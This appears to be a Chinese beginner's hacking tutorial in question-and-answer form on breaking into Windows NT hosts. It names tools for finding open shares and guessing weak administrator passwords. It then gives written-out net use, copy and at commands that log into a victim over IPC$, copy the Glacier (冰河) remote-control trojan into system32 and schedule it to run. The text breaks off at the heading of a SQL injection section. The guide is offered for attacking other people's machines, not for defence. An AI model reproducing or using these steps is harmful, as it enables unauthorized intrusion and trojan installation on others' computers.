文章来源:LG小生网络

    问：什么常见命令啊，什么工具啊，如何入侵，我还不会啊，能简单通俗的讲解一下吗？

    答：一般的初步入侵可以分为三步：

    1，扫描目标主机并分析扫描信息。 比如 探测开放的端口，获得服务软件及版本， 探测漏洞等等

    2，利用漏洞。探测并获取帐号或密码系统

    3，获得权限，进行操作。 

    不要太专业，太深入，太冗长，仅仅举个两个实际例子，不涉及任何高深知识，从工具角度来讲，但从中可以看出入侵的一般步骤：

    一，入侵单机－－－普通攻击 4个工具： 1，shed.exe 2，流光2000 3，cmd.exe 4，冰河8.4
操作系统：winnt系统。 

    “shed.exe”：其实就是用来网上查共享资源的，速度快，可以查到很多服务断的共享文件，不过在这里面有些ip在浏览器中无法访问，这是因为其中也包含了个人上网的ip．

    “流光”：一些作网站和网吧的服务器一些目录都是共享的，有些是可以访问，但是不能删除，因为你所访问的都是以匿名访问的，权限不够！有些需要密码。遇到密码怎办？用流光！ 用流光的ipc探测，建立一个空对话，查到用户列表，然后先简单探测，此时有些网管懒惰，把administrator设置的过于简单，便可以抓到肉鸡了。

    使用冰河控制一台服务器速度很快，（因为服务器那边带宽很大）几分钟就可以查到对方主机的主页所在位置。但是如何上传并且控制他呢？ 执行cmd.exe 使用net命令具体操作如下：

    第一步：net use \\ip\ipc$　“password” /user:”user” 说明：以一个超级用户名与你想黑的网站建立联接，当然超级用户必须是该网站admin里的。这里的”ip”就是主机了，“password”就是超级用户的密码，“user”就是超级用户。比如：net use \\210.*.*.*\ipc$ “juntuan” /user:"juntuan"

    第二步：copy g-server.exe \\ip\admin$\system32 说明：g-server.exe就是冰河的远程服务器端。意义：将此文件拷贝到对方的主机winnt里的system32目录里。最好用最新的木马！哈哈，荷马以及教主还有很多人他们到处卖马呢，晕死......

    第三步：net time \\ip 察看对方的服务器时间。由于有时差，应该是一个小时吧！所以必须要以对方的服务器时间为准。 

    第四步：at \\ip time g-server.exe 这里的time就是对方的主机时间。作用：在规定时间执行该程序。比如　at \\210.*.*.* 19:55 g-server.exe 第五步：冰河就可以控制该电脑了。

    二，入侵网站－－－－SQL注入攻击
<